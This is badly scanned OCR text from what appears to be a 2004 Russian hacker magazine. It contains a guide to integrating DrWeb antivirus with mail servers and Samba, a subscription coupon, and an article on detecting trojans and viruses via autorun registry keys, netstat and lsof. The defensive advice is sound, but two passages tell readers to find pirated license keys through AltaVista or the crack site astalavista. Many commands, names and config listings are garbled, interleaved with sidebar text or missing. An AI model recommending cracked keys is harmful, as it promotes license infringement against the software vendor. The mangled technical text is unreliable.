сервер возвращает ответ - "все чис- 
то". В этом случае drweb-smf затирает 
временный документ и ничего не 
возвращает почтовому серверу. В 
противном случае все зависит от кон- 
фа: в режиме quarantine сфайл авто- 
матически переносится в каталог ин- 
фицированных сообщений, метод 
reject просто блокирует доставку (с 
оповещением), discard молча удалит 
сообщение, а redirect вернет сообще- 
ние отправителю. Подробнее о мето- 
дах мы поговорим немного позже. 


Теперь ты знаешь, что drweb-smf яв- 
ляется лишь посредником между сер- 
вером sendmail и drwebd. Это очень 


Ш В рамках этого материала я не мог описать настройку всех 


поддерживаемых почтовых сервисов. Поэтому просто назову их. 
Итак, Drweb может интегрироваться с CommuniGate, Sendmail, 
Exim, Postfix,QMail, Zmailer, а также Samba. 


важно, так как понимание всего вы- 
шеизложенного избавит тебя от проб- 
лем с редактированием консфигураци- 
онных сфайлов. 


НАЧАЛО ПОЛОЖЕНО: СЕРВЕР 
УСТАНОВЛЕН 

Без правильной установки серве- 
ра не будет работать ни один клиент, 
поэтому топаем на www.drweb.ru и 
качаем свежую версию базовой пос- 
тавки антивируса 
(ftp://ftp.drweb.ru/pub/unix/drweb- 
4.29.2-glibc.2.2.tar.gz). DrWeb опять 
же поставляется в бинарном виде, 
так как является коммерческим про- 
дуктом (но какой ты хакер, если не 
можешь найти лицензионный ключ 
на альтависте? ;)). Запускаем 
install.sh скрипт, который спросит у 
тебя путь к главной директории сер- 
вера, а затем раскидает конфы (в 
/etc/drweb) и бинарники (/opt/drweb 
по умолчанию) на свои места. От те- 
бя остается только грамотно настро- 
ить конф /etc/drweb/drweb32.ini, чем 
мы сейчас и займемся. 


На самом деле, по gecponty, конфиг 
является вполне рабочим, но это не 
означает, что ты должен полностью 
задвинуть на проблему его измене- 
ния и перейти к следующему шагу. 
Значительное количество опций в 
файле требуют понимания. 


Конофриг начинается с параметров 
для клиента drweb. В начале секции 
[Linux] предоставляются пути к биб- 
лиотеке drweb (EnginePath), вирус- 
ным базам (VirusBase), а также к ка- 
талогу инфицированных файлов 
(MoveFilesTo). При стандартной инс- 
талляции нет нужды изменять эти 
параметры, поэтому не буду заост- 
рять на них внимание. Далее идут ти- 
пы файлов, которые будут прове- 
ряться клиентом, а также путь к лог- 
файлу, куда пишет drweb (советую 
на досуге его почитать). Следом идут 
логические опции на предмет про- 
верки архивов и всех E-mail сфайлов. 


В следующей секции [Linux:Daemon] 
расположены параметры, которые 
обрабатывает сервер drwebd. Здесь 
ты можешь изменить режим сервера 
(daemon или unix socket). По умолча- 
нию демон следит за 3000 портом и 
пишет логи через syslog 
(LogFileName = "syslog"). Если ты хо- 
чешь отдельный [09-файл, минуя 
сислог, просто переопредели эту on- 
цию. В параметре Interfaces задается 
интерфейс, на который "садится" 
сервер (в случае удаленной провер- 
ки файлов целесообразно изменить 
его значение). 


Самыми интересными параметрами в 
конфе являются, пожалуй, фильтры 
на поля E-mail. За это отвечает 
FilterRule. Например, при значении 
"Subject "*Ореп the attach*" Reject" 


Drweb-smf 


является 
лишь пос- 
редником 
между сер- 
вером send- 
тан и 
drwebd. Это 
очень важ- 
но, так как 
понимание 
всего выше- 
изложенно- 
го избавит 
тебя от 
проблем с 
редактиро- 
ванием кон- 
фигураци- 
онных фай- 
лов. 


сервер будет автоматически считать 
письмо зараженным. Рекоменаую по- 
играться с этой опцией и достичь 
нужного результата. 


Напоследок стоит врубить сервер ко- 
MaHgon service drwebd start, а затем 
добавить его в автозапуск. Это сдела- 
ет chkconfig (chkconfig --add агммеБа). у 


По дефол- 
ту, конфиг 
является 
вполне ра- 
бочим, но 
это не озна- 
чает, что 
ты должен 
полностью 
задвинуть 
на проблему 
его измене- 
ния и пе- 
рейти к 
следующе- 
му шагу. 
Значитель- 
ное количе- 
ство опций 
в файле 
требует по- 
нимания. 


DRWEB - КАК ЗА КАМЕННОЙ СТЕНОЙ! 


НОВОЕ ПОКОЛЕНИЕ ВЫБИРАЕТ 
COMMUNIGATE! 

m= Если ты сталкивался с проблемой 
выбора почтовика, то понимаешь - 
для того чтобы включить какую-либо 
фичу в sendmail, нужно перечитать 
туеву хучу манов, а потом насладить- 
ся редактированием сложного файла 
конфигурации. Компания Stalker пош- 
ла другим путем - она выпустила 
удобный почтовый сервер 
CommuniGate, который админится че- 
рез \\МеБ-интерфейс. Что удобнее: pe- 
дактировать конф два часа или сде- 
лать пару кликов мышью и добиться 
того же результата? Ответ очевиден, 
поэтому люди плавно переходят на 
CommuniGate (кстати, в плане багов 
он намного стабильнее из-за скрытых 
исходников). 


Drweb прекрасно взаимодействует с 
CommuniGate. Для этого нужно ска- 
чать специальный клиент, который 
выложен по адресу 
ftp://ftp.drweb.ru/pub/unix/drweb-cgp- 
4.29.12-E-linux.tar.gz. Распаковываем и 
вручную раскидываем директории на 
их законные места (разработчики по- 
ленились даже положить специаль- 
ный install-ckpunt). В бинарной дирек- 
тории мы найдем клиента drweb-cgp и 
краткую документацию по его работе. 
Нас больше интересует файлы в 
/etc/drweb. Там находится, собствен- 
но, конфиг клиента, пара конофигов, 
которые служат для пластичной 
фильтрации пользователей, нуждаю- 
щихся в проверке. И напоследок база 
с вирусами, в которую ты можешь 90- 
бавить любое запрещенное или раз- 
решенное имя срайла. 


Остановимся подробнее на конориге. 
Дело в том, что конфигурационный 
файл для всех почтовых фильтров 
практически одинаковый, поэтому, ес- 
ли ты поймешь один конориг, с другим 
у тебя проблем не возникнет. В табли- 
це я укажу лишь особые параметры, 
которые важны для понимания. Ос- 
тальные можешь оставить как есть. 


Fi tae 
et | Ss ee ee! 
beer Bek, ПИ ie ПИШИ LL че 


Sel eet rises Бы Bi ee si te 


= ee йа ae 


Фильтрация письма DrWeb'om 


С конфигом разобрались. Впредь я не 
буду возвращаться к вопросу его ре- 
дактирования, потому что, как я уже 
сказал, срайл одинаков для всех поч- 
товых систем. 


Теперь обратимся к файлам 
users.conf и addresses.conf. Он имеет 
очень простой синтаксис и служит 
для задания адресов, которые не бу- 
дут подвергаться проверке на вирусы. 
Подробное описание его настройки 


Фрагмент рабочего конфига 
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лежит в документации и не представ- 
ляет особой сложности, поэтому не 
будем обращать на него особого вни- 
мания. 


В viruses.conf ты можешь задать мас- 
ку на имя аттача и соответственно вы- 
нести "приговор" для него. К примеру, 
правило 
allow deny deny allow "Viruzz" 
разрешает отправление уведомления 
админу, но запрещает отправителю и 
приемнику. Также кладет зараженный 
файл, совпадающий с подстрокой 
"Viruzz", в "карантин". 


С настройкой разобрались. Теперь ос- 
талось протестировать клиент. Для 
этого используем параметр -- 
check_only в его запуске. Если все 
сделано правильно, на мыло админу 
придет тестовое уведомление. 


Теперь займемся коммунигейтом. Для 
корректной обработки сообщений не- 
обходимо проставить фильтр и вклю- 
чить поддержку внешнего обработчи- 
ка, то бишь клиента. Для этого захо- 

gum на WebAdmin во вкладку General- 
>Helpers. Там ставим галочку напротив 
Content Filtering и указываем полный 


путь к фильтру сообщений. После 
этого все заголовки будут переда- 
ваться программе. 


Теперь зайдем во вкладку Rules. Там 


создаем новое правило с условием на 
размер сообщения (я поставил мини- 

мальное ограничение на 3 Кб) и пере- 
направляем сообщение на 


ВЫБОР НУЖНОЙ БИБЛИОТЕКИ DRWEB 


Конфигурационный файл 5еп 


ExternalFilter. Обзовем правило име- 
нем drweb-filter. 

Настало время проверить работу пе- 
рехватчика. Для этого просто зашли 
вирус на свой локальный адрес. В 
случае успеха тебе, отправителю и 
админу придет уведомление о нали- 
чии вируса в теле сообщения. Это 
означает, что все работает как нуж- 
но. В противном случае смотри логи 
коммунигейта и демона - что-то ра- 
ботает не так. 


SENDMAIL ДЛЯ УМНЫХ 
АДМИНОВ 

Вернемся к нашим баранам. А 
именно к тому, с чего я начинал свою 
статью. Для настройки Sendmail важ- 
но знать, что демон обязательно соб- 
ран с поддержкой MilterAPI. Если это 


ЧТО-ТО НЕ РАБОТАЕТ 


так, открываем /etc/mail/sendmail.cf и 
вписываем туда следующие строки: 


ФРАГМЕНТ SMB.CONF 


Затем перекомпилим конфриг и пере- 
запустим sendmail. 


Внимание! Параметры работают лишь 
в сервере версии 8.12. Для более ста- 
рых версий варианты конфига указа- 
ны в документации к фильтру. 
Настройка клиента аналогична в слу- 
чае с CommuniGate, поэтому в описа- 
нии не нуждается. Следует отметить, 
что программа-фильтр будет назы- 
ваться drweb-smf. 


DRWEB VS EXIM 

Не менее популярным почтовиком 
является exim (www.exim.org). Для не- 
го также существует клиент drweb, ко- 
торый фильтрует входящие и исходя- 
щие сообщения. Скачать ты его мо- 
жешь по адресу 
ftp://ftp.drweb.ru/pub/unix/drweb-exim- 
4.29.12-F-linux.tar.gz. После распаков- 
ки и перемещения клиента займемся 
редактированием консрига почтовика. 


В первую очередь необходимо доба- 
вить в раздел "MESSAGE FILTER CON- 
FIGURATION SETTINGS" следующие 
параметры: 


Далее в разделе "TRANSPORTS CON- 
FIGURATION": 


И, HAKOHEL, в пути, описанном выше 
как (/путь/к/системному/сфильтру), 
нужно создать файл cpunbTpa, или, 
если файл уже существует, достаточ- 
но добавить в него новый фильтр: 


» 


Самыми ин- 
тересными 
параметра- 
ми в конфе 
являются, 
пожалуй, 
фильтры на 
поля Е-тай. 
За это от- 
вечает 
FilterRule. 
Например, 
при значе- 
нии 
“Subject 
"*Ореп the 
attach*" 
Reject" cep- 
вер будет 
автомати- 
чески счи- 
тать письмо 
заражен- 
ным. Реко- 
мендую по- 
играться с 
этой опцией 
и достичь 
нужного ре- 
зультата. 


DRWEB - КАК ЗА КАМЕННОЙ СТЕНОЙ! | 


Админы 
поднимают 
различные 
службы, од- 
ной из ко- 


торых явля- 
ется smbd, 
разрешаю- 
щая вход на 
расшарен- 
ные ресур- 
сы. Злоу- 
мышленник 
запросто 
может за- 
лить вирус 
через этот 
сервис и за- 
пустить его 
на клиен- 
тской ма- 
шине... ес- 
ли, конечно, 
drweb не 
будет сле- 
дить за ним 
1). 
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Добавляем путь к vfs модулю 


БЕЗОПАСНЫЙ SMBD 

Как правило, в локалке одним 
почтовым сервисом дело не ограничи- 
вается. Админы поднимают различ- 
ные службы, одной из которых явля- 
ется smbd, разрешающая вход Ha рас- 
шаренные ресурсы. 


linux.tar.gz). Кстати, этот клиент пос- 
тавляется с зоигсе-соде, поэтому мо- 
жешь закачать версию, которую при- 
дется компилить 
(ftp://ftp.drweb.ru/pub/unix/drweb- 
samba-4.29.12-C-sources.tar.gz). Kak 
обычно, раскидываем KOHCpur модуля, 
а также нужную библиотеку в SBIN- 
PATH/lib. Выбор библиотеки зависит 
от версии демона. 


Версию smbd можно узнать, набрав 
smbd -V. После выбора нужной либы, 
скопируй ее в указанную выше дирек- 
торию и сделай линк на smb_spider.so 
(для удобства) командой In -s smb_spi- 
der.so.X smb_spider.so. 


Следующим шагом будет редактиро- 
вание smb_spider.conf. Там следует 
указать метод перехвата, остальные 
опции не отличаются от описанных 
ранее. Метод может быть onAccess 
(при любом изменении сфайла и его 
открытии), ONRead (только при откры- 
тии) и onWrite (при модификации). Ос- 
тальные параметры не отличаются от 
изложенных выше. 


Напоследок изменим 
/etc/samba/smb.conf (или другое его 
местоположение). Пусть там сущест- 
вует ресурс [shared], который следует 
проверять на вирусы. 


И в довершении выполним команду 
service smb reload, чтобы перечитать 
конориг. 


Теперь проверяем. Коннектитимся на 
smb: 


Как видим, все работает. При прочте- 
нии лога ты узнаешь подробности ре- 
акции smb_spider.so на заразу. 2 


Злоумышленник зап- 
росто может залить 
вирус через этот сер- 
вис и запустить его 
на клиентской маши- 
не... если, конечно, 
drweb не будет сле- 
дить за ним ;). 


Итак, сейчас мы за- 
щитим smbd от раз- 
носчиков заразы. 
Для этого скачаем 
модуль с официаль- 


Затем запускаем drweb-exim -- 
спеск_оту и удостоверимся, что все 


работает как надо. Напоследок pecta- ного сайта 
ртнем exim и протестируем работоспо- — (Ёр://Нр.агмер.ги/ 
собность фильтра. pub/unix/drweb- 


samba-4.29.12-C- 
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ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 11 НОМЕРОВ 
ПОЛУГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 5 НОМЕРОВ 


ЦЕНЫ ДЕЙСТВИТЕЛЬНЫ ПРИ ОПЛАТЕ ПО ДАННОМУ КУПОНУ ДО 30 НОЯБРЯ 


редакционная 
ПОДПИСКА! 


Вы можете оформить редакционную подписку на любой российский адрес 


Для этого необходимо: 
1. Заполнить подписной купон (или 
его ксерокопию). 


2. Заполнить квитанцию (или 
ксерокопию). Стоимость подписки 
заполняется из расчета: 


6 месяцев - 690 р. =» «р» 
12 месяцев - 1380 р. _  1265р.. 


(В стоимость подписки включена 
доставка заказной бандеролью.) 


3. Перечислить стоимость подписки 
через Сбербанк. 


4. Обязательно прислать в редакцию 
копию оплаченной квитанции с четко 
заполненным купоном 

или по электронной почте 
subscribe_xs@gameland.ru 

или по факсу 924-9694 
(с пометкой "редакционная 
подписка"). 

или по адресу: 

103031, Москва, Дмитровский 
переулок, д 4, строение 2, 
ООО "Гейм Лэнд" (с пометкой 
"Редакционная подписка"). 


Рекомендуем использовать 
электронную почту или факс. 


ЦЕНЫ ДЕЙСТВИТЕЛЬНЫ ПРИ 
ОПЛАТЕ ПО ДАННОМУ 


КУПОНУ ДО 30 НОЯБРЯ 


Подписка для юридических лиц 
Юридическим лицам для оформления 
подписки необходимо прислать заявку 
на получение счета для оплаты по 
адресу subscribe_xs@gameland.ru или 
по факсу 924-9694 (с пометкой 
"редакционная подписка"). В заявке 
указать полные банковские реквизиты и 
адрес получателя. Подписка оформля- 
ется на 12 месяцев, начиная с месяца, 
следующего после оплаты. 


Ф.И.О. 


ПОДПИСНОЙ КУПОН (подписка через редакцию) 
Прошу оформить подписку на журнал "ХакерСпец" 


С на первое полугодие 2004 г 
Сна 2004 год 


(отметьте квадрат, выбранного варианта подписки) 


Город/село 


ул. 


Дом корп. 


Сумма оплаты 


КВ. тел. 


Подпись 


Дата е-тай: 


Копия платежного поручения прилагается. 


Извещение 


Кассир 


ИНН 7729410015 ООО"ГеймЛэнд" 

ЗАО — Международный Московский Банк , г. Москва 

р/с №40702810700010298407 

к/с №30101810300000000545 

БИК 044525545 КПП - 772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала "ХакерСпец" 


Сна первое полугодие 2004 г. 
Сна 2004 год 


Сумма 


Подпись плательщика 


Квитанция 


Кассир 


ИНН 7729410015 ООО"ГеймЛэнд" 


ЗАО — Международный Московский Банк , г. Москва 
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к/с №30101810300000000545 
БИК 044525545 КПП - 772901001 
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Адрес (с индексом) 


Назначение платежа 
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Подпись плательщика 


Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 
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НАЙДЕМ 
И ОБЕЗВРЕДИМ: 


КАК ОБНАРУЖИТЬ ЗАРАЗУ В СИСТЕМЕ 


ь. 


В наши дни компьютерными вирусами никого не удивишь. Более того, наверное, каждый по неосторожности (или по 
невнимательности) заражал свою систему. Самое обидное, что электронная зараза никогда не выдает себя, а молча 
делает свое черное дело на беззащитном компьютере жертвы... 


= 


одной стороны, так и 


должно быть. Как и 


обычные вирусы, 


компьютерные ведут 
невидимый для пользо- 
вателя образ жизни. Это действитель- 
но так, суди сам: реальный вирус про- 

никает в организм и потихоньку зара- 

жает его клетки. В первые дни чело- 


рис. Константин Комардин 


Реальный 
вирус про- век даже не чувствует присутствия за- 
никает в разы, но через некоторое время вирус 
организм и 5 
ЕЯ начинает активно проявлять себя и гу 
заражает бительно воздействовать на жизнен- 
Ка но важные органы. Электронный вирь 
дни человек вместо клеток поражает... правильно, 
даже не фрайлы! Методики саморазмножения 
чувствует . 2 
присутствия заразы различны: о них рассказывает 
заразы, но ся в других статьях этого выпуска. 
через неко- 
торое время 7 
вирус начи- ЗАРАЗА БЫВАЕТ РАЗНОЙ... 
нае Glue м Чтобы во время чтения этой 
но прояв- 
лять себя и статьи не возникло путаницы, следует 
губительно окончательно определиться, какие 
воздеиство- б 
РЕН виды опасных экземпляров мы будем 
жизненно рассматривать. Если порыться на сай- 
важные ор тах по вирусологии, то можно найти 
ганы. ру ь С 
Электрон- несколько определений понятия "ви- 
ВИ рус". Все они сводятся к тому, что ви- 
вместо кле- 
ток поража- ри заносятся в систему, а затем через 
ет... пра- какой-то промежуток времени (или 
Вильно, 
ИН, сразу) начинают заражать опреде- 
ленные типы сфайлов. Такие "экземп- 
ляры" появились очень давно - еще 
go рождения Сети. Они до сих пор пи- 
шутся, и методы их размножения со- 
вершенствуются с каждым годом. 
Трояны, в р у 9 9 
отличие от 
ру Но с появлением возможности выхо- том, что он запустил что-то не то (если, 
обычно не > 
nanGcaT да в Сеть, возникает новый вид зара- конечно, на ПК не будет установлен сра- 
системе зы - трояны. Трояны, в отличие от ви- ервол =)). 
Ре русов, обычно не наносят системе @. Прописывает себя в системе на 
них другая особого вреда. У них другая функция постоянное местожительство. Троян 
ла - переслать личную информацию с либо регулярно следит за портом, ли- 
личную ин- компьютера жертвы в руки злоумыш- бо делает зловредные вещи (к приме- 
формацию с ленника. Делают они это незаметно и ру, раз в неделю отсылает дамп всех 
(+) ьютера : 
отв весьма искусно. Как только троян ус- клавиш на е-тай злоумышленника). 
руки злоу- танавливается на машину ушастого Обнаружить такую заразу в несколь- 
ево юзера, он выбирает для себя один из ко раз легче, чем в первом случае. 
они это не- двух путей своего существования: 
са В этой статье я постараюсь подробно ос- 
кусно. @. Выполнив одиночную функцию ветить методы защиты как от вирусов, 
(например, высылка паролей Ha e-mail ха- так и от троянов. При этом не буду заост- 
кера), зараза сама себя уничтожает. При | Серверная часть известного трояна рять внимание на видах заразы, с по- 
этом юзер вообще может не узнать о ‚ "Смерть ламера" 
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мощью приведенной выше классисрикации ты сам поймешь, о 
чем идет речь. 


НАХОДИМ И УДАЛЯЕМ! 

и Несмотря на непохожесть вируса и трояна, у них есть 
одна общая черта. Зараза всегда пытается прописать себя 
в автозапуск. Иными словами, чтобы программа могла 
подгрузиться в память при старте компа, она заносит себя 
в разделы реестра. Таких разделов может быть несколько. 
Разработчики Microsoft позаботились о пользователе и 
придумали хорошую утилиту msconfig, которая существует 
почти во всех версиях окошек (за исключением wind и 
win2000). Привлекательность этой системной программы в 
том, что она объединяет все вкладки реестра, папку авто- 
загрузки и показывает пользователю информацию обо 
всех запускаемых программах. 


Таким образом, чтобы узнать, существует ли зараза в твоей 
системе, достаточно зайти в меню "Пуск", нажать мышкой 
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Обнаруживаем чужого среди своих 


на пункт "Выполнить" и написать "msconfig". Нас интересу- 
ет вкладка "Автозапуск", в которой ровной таблицей выпи- 
саны все приложения, стартуемые при запуске системы. 
Стоит заметить, что трояны и вирусы редко когда называются 
"некрасивым" именем. Как правило, электронная зараза пе- 
реименовывается в безобидного вида программу со звучным 
названием и лишь затем прописывает себя в автозапуск. По- 
этому для того, чтобы быстро сориентироваться в этом списке 
и обнаружить трояна, ты должен точно знать, какие приложе- 
ния в твоей системе заслуживают доверия. 

Как я уже говорил, программа msconfig присутствует не во 
всех дистрибутивах. Если ты счастливый обладатель Windows 
2000, то ты не сможешь воспользоваться услугами этого при- 
ложения. В этом случае у тебя есть два варианта: либо качать 
подобный COCPT, который проверяет ветки реестра на предмет 
автозапуска программ (такого ПО очень много), либо обра- 
титься к системному реестру редактором regedit. Во втором 
случае, тебя интересуют ветки HKEY_LOCAL_MACHINE\SOFT- 
WARE\Microsoft\Windows\CurrentVersion\Run RunOnce, 
RunOnceEx, a также HKEY_CURRENT_USER\..\Run, 
HKEY_USERS\..\Run и HKLM\Software\Microsoft\Windows\ 
CurrentVersion\Explorer\ (туда трой может прописаться в зна- 
чение параметра User Shell Folders Common Startup). Именно 
там хранятся названия приложений, запускаемые BO время 
старта твоей операционки. 


Но помни, что вирусы могут заразить системные утилиты, в 
том числе msconfig и regedit. На личном примере скажу, 
что однажды я подхватил заразу, которая просто удалила 
эти жизненно важные приложения из системы. Поэтому 
всегда имей резервные копии программ, типа msconfig, 
чтобы можно было в любой момент проверить свою ОС. 


Тема автозапуска очень обширна и может обсуждаться GO- 
вольно долго. Дело в том, что электронная зараза способ- 
на представить себя сервисом и прописаться уже в другом 
системном списке. В этом случае обнаружить ее становит- 
ся сложнее. Существует метод запуска, согласно которому 
программа выдает себя за скринсейвер. В этом случае он 

не появится в диспетчере задач и скроется от глаз любо- » 
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НАЙДЕМ И ОБЕЗВРЕДИМ! \ 


Я лично знал 
человека, 
который пе- 
решел на 
Linux и долго 
смеялся над 
проблемой 
вирусов в 
винде. Есте- 
ственно, что 
о собствен- 
ной безопас- 
ности он да- 
же не заду- 
мывался, по- 
ка за это не 
поплатился. 
Запустив пор 
рутом какой- 
то наворо- 
ченный 
эксплоит под 
все плат- 
формы ;), го- 
ре-хакер ли- 
шился систе- 
мы за нес- 
колько дней. 


СЛОВО ОБ 10$ 


пытного пользователя. Как ты, навер- 
ное, понял, вирусы и трояны редко 
когда светятся в списке процессов, 
обойти который довольно просто (во 
всяком случае, в win9x). 


КТО СТУЧИТСЯ В ПОРТ 
КО МНЕ? 

Поговорим о троянах. Если с их 
обнаружением придется попотеть, то 
пресечь их деятельность можно без 
проблем. Как правило, любой троян 
либо отсылает данные о системе в 
глобал (чаще всего Ha e-mail), либо 
открывает порт, после чего злоумыш- 
ленник может подсоединиться к опе- 
рационке и сделать все, что его инте- 
ресует. Сейчас мы попробуем обнару- 
жить присутствие трояна. 


Открой командный интерпретатор 
(cmd.exe или command.com) и напиши 
в нем команду netstat -ап. Программа 
выдаст в ответ список портов, кото- 
рые листаются в системе, а также ад- 
реса, подключившиеся к твоему 
компьютеру. Это очень удобно, а учи- 
тывая, что троян не заражает служеб- 
ные утилиты, обнаружить его присут- 
ствие может любой желающий (хотя 
это и не всегда так - бывает и комби- 
нированная зараза, которая модифи- 
цирует бинарники и затем открывает 
порт). 


Наглядный пример. Пусть netstat по- 
казал тебе строку следующего вида: 


АНТИВИРУСЫ 
НА СТРАЖЕ ПОРЯДКА 

С одним разобрались. Теперь 
пришло время поговорить о вирусах. 
В наше время обнаружить грамотно 
написанный вирус невооруженным 
взглядом крайне трудно, я бы даже 
сказал, практически невозможно. Это 
связано с очень сложными алгорит- 
мами заражения системы, которые ис- 
пользует зло-программа. Но вместе с 
вирями развиваются и антивирусы, 
которых очень много. 


Как правило, все антивирусы постав- 
ляются двумя главными приложения- 


Это означает, что 
в системе открыт 
31337 порт и к He- 
му присоединился 
неприятель с ag- 
ресом 
212.220.32.43. 
После обнаруже- 
ния такой строки 
тебе следует не- 
медленно выйти 
из Сети и начать 
поиск трояна, ко- 
торый следит за 
открытым портом. 
Вообще, систем- 
ными утилитами 
легко пользовать- 


ся лишь в TOM 
случае, если ты 
уже набил руку. 


я АУР 
Я АУ! 


Конечно, человек, который первый 
раз столкнулся с командой netstat, не 
увидит в ее выводе ничего полезного. 
В этом случае тебе помогут... наши 
доблестные программисты. 


Дело в том, что мы живем в такое 
время, когда редко найдешь человека 
без персонального фаервола в своей 
системе. Такие программы защищают 
компьютер от незаконного проникно- 
вения заразы. Они могут быть как 
очень простыми (ZoneAlarm), так и 90- 
вольно сложными (например, 5уда{е). 
Но любой фаервол никогда не про- 
пустит приложение в интернет без 
согласия пользователя. Поэтому вы- 
бери для себя подходящую сосбфтину, 
и ты навсегда обезопасишь себя от 
заразы. 


ми: собственно программа, проверяю- 
щая все системные сфайлы по боль- 
шой базе, и монитор, который спосо- 
бен перехватывать электронную зара- 
зу прямо при ее запуске (на лету). 


Проверенными и надежными антиви- 
русами, как всегда, являются AVP и 
DrWeb. Они установлены на компью- 
терах у большинства пользователей 
и постоянно обновляются. Кроме того, 
любой уважающий себя перехватчик 
заразы постоянно сканирует опера- 
тивную память на предмет присут- 
ствия в ней вируса. Если этого не де- 
лать, вирь может запросто заразить 
сам антивирус, после чего программа 
не сможет выполнять свои функции. 
Как я уже говорил, в наше время су- 
ществует очень много разных анти- 
вирусов. У всех имеются свои плюсы 


НОСТИ С ЛЕЧЕНИЕМ ОТ ВИРУСОВ 
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и минусы. Поэтому специально gna тебя мы подготовили 
небольшой тематический обзор таких программ. После его 
прочтения ты сможешь выбрать для себя оптимальный по 
возможностям антивирус и всегда быть в относительной 
безопасности ;). 


ЫМОХ"ОВЫЕ СТРАСТИ 

Если с Windows все довольно просто, то в *nix-like сис- 
темах с безопасностью все намного сложнее. Под эти опе- 
рационки также имеются свои вирусы и трояны. Казалось 
бы, с такой политикой безопасности, как в Мпих, никакой 
вирус не способен поразить систему, но многие до сих пор 
запускают под суперпользователем вредоносные програм- 
мы, тем самым заражая свою операционку. Поэтому если ты 
не уверен в том, что файл не причинит системе вреда, ни- 
когда не запускай его под гоо{-правами (а лучше вообще 
не экспериментировать с таким запуском). Я лично знал че- 
ловека, который перешел Ha Linux и долго смеялся Hag 
проблемой вирусов в винде. Естественно, что о собствен- 
ной безопасности он даже не задумывался, пока за это не 
поплатился. Запустив пор рутом какой-то навороченный 
эксплоит под все платорормы ;), горе-хакер лишился систе- 
мы за несколько дней. Как оказалось позже, он активиро- 
вал один из опасных вирей, который дописывал себя в ELF- 
бинарники несколько раз в день, а через неделю делал заг- 
рузку ОС невозможной. 


Мораль сей басни: вирусы nog Linux всегда существовали и 
существуют до сих пор. Кроме того, такая зараза не поща- 
дит твою систему, а изменит в ней все бинарные файлы. 
Лечение антивирусом, конечно, возможно, но с этим связан 
ряд осложнений, о которых мы поговорим чуть ниже. 


СЛОВО 0 СКРИПТАХ 

Если ты линуксоид, то знаешь, что в системе существу- 
ет понятие "стартовый скрипт", который обрабатывается 
каждый раз при ее стартапе. Все команды в нем выполнят- 
ся под суперпользователем. Именно в них обживается 
электронная зараза, типа различных троянов (вирусы запи- 
сывают себя непосредственно в структуру системного фай- 
ла). Казалось бы, обнаружить трой среди скриптов очень 
просто, но это не совсем так. Большие стартовые файлы 
очень сложно читать, а если учесть, что бэкдоры маскиру- 
ются под имена каких-пибо модулей, то задача усложняет- 
ся в несколько раз. Но это опять же в случае, если зараза 
была запущена под суперпользователем. Если зло-прог- 
рамма стартуется обычным юзером, то у нее, пожалуй, 
единственный способ повторно запуститься в системе - 
crontab пользователя. Поэтому регулярная проверка 
сгопкаб-скрипта не будет лишней. 


Все стартовые срайлы располагаются в каталоге /etc/rc.d/ 
gna Linux, либо в /etc/rc.* для FreeBSD. Убедись, что прос- 
той смертный не способен записать в них команды. И вооб- 
ще, регулярная проверка таких стартовых документов ни- 
когда не помешает, если учесть, что тебя мог зарутать кру- 
той хакер из интернета =). » 
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Системными 
утилитами 
легко поль- 
зоваться 


ли ты уже 
набил руку. 
Конечно, 
человек, ко- 
торый пер- 
вый раз 
столкнулся 
с командой 
netstat, не 
увидит в ее 
выводе ни- 
чего полез- 
ного. В этом 
случае тебе 
помогут... 
наши go6- 
лестные 
программис- 
ты. 


МЕСТА ОБИТАНИЯ ЗАРАЗЫ 


Помни, что вирусы могут находиться 
в оперативной памяти и заразить 
cam DrWeb. 


СЕТЕВАЯ И СИСТЕМНАЯ 
АКТИВНОСТЬ 

По аналогии с виндой, в пингвине 
существует команда netstat. Она по- 
казывает состояние портов и сете- 
вые подключения в данный момент. 
Ее вывод гораздо длиннее, по срав- 
нению с Win32, поэтому используй 
команду netstat -ап | grep LISTEN, ли- 
бо netstat -an | grep ESTABLISHED. 
Тем самым ты отфильтруешь всю ин- 
формацию, кроме состояния портов 
и активных подключений. Весьма по- 
лезна опция -р этого же приложения, 
которой нет в Win32. С помощью это- 
го ключика становится возможным 
посмотреть PID и полный путь к фай- 
лу, который работает с указанным 
портом. 
К слову сказать, любой уважающий 
себя rootkit (комплект зараженных 
утилит для предоставления дополни- 
тельных привилегий хакеру) содер- 
жит в своем комплекте измененные 
бинарные файлы netstat, ps, kill и 
прочие важные бинарники. О том, 
как обнаружить такую подделку, я 
расскажу в следующем разделе. 
А теперь заострим внимание на том, 
что зараза может называться служеб- 
ным именем и даже может быть видна 
в таблице процессов. При этом поль- 
зователь даже не догадается, что этот 
процесс является трояном. Чтобы оп- 
ределить, какие в данный момент биб- 
лиотеки юзает приложение, сущест- 
вует приложение Isof (ftp://Isof.itap. 
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Из таблицы видно, что бинарник httpd 
заражен и использует в своей работе 
библиотеку listen31337.so. Ее назва- 
ние весьма условно, но отражает си- 
туацию в полном объеме. 


НА КАЖДОЕ ДЕЙСТВИЕ ЕСТЬ 
ПРОТИВОДЕЙСТВИЕ! 

Под Linux также существуют свои 
антивирусы. Среди них опять же са- 
мые популярные - DrWeb и AVP. Они 
умеют не только проверять систем- 
ные файлы и перехватывать заразу 
"на лету", но и работать совместно с 
почтовыми серверами, оберегая юзе- 
ров от лишних проблем =). 


Рассмотрим простейший DrWeb 
(ftp://ftp.drweb.ru/pub/unix/4.29.5/dr 


Помимо антивирусов существует 
множество программ, нацеленных 
на обнаружение всяческих изменений 
в системе 


purdue.edu/pub/ 

tools/unix/Isof). Без параметров оно 
покажет тебе всю активность прило- 
жений. Если отфильтровать его ответ 
по отдельной задаче, получаем список 
библиотек, используемых определен- 
ным процессом. Например: 


web-4.29.5-glibc.2.2.tar.gz). После его 
установки необходимо зарегистриро- 
вать копию. Ключи будут находиться 
в специальном файле drweb.ini. Най- 
ти его можно на кряк-поисковике, 
например на http://astalavista.box.sk/. 
Затем набери команду man drweb и 
узнаешь пол- 


ную информа- 
цию о парамет- 
рах запуска ан- 
тивируса. 
Помни, что виру- 
сы могут нахо- 
диться в опера- 
тивной памяти и 
заразить сам 
DrWeb. Поэтому 
в нем встроена 
защита - прог- 
рамма автомати- 
чески выгружа- 
ется при попыт- 


ке заражения. 


Иногда прихо- 
дится запускать антивирь из нестан- 
дартных каталогов, которые вири 
просто не обрабатывают (я сам восста- 
навливал систему из каталога /dev 
после атаки вируса). Вообще, для пол- 
ного представления о вире, с которым 
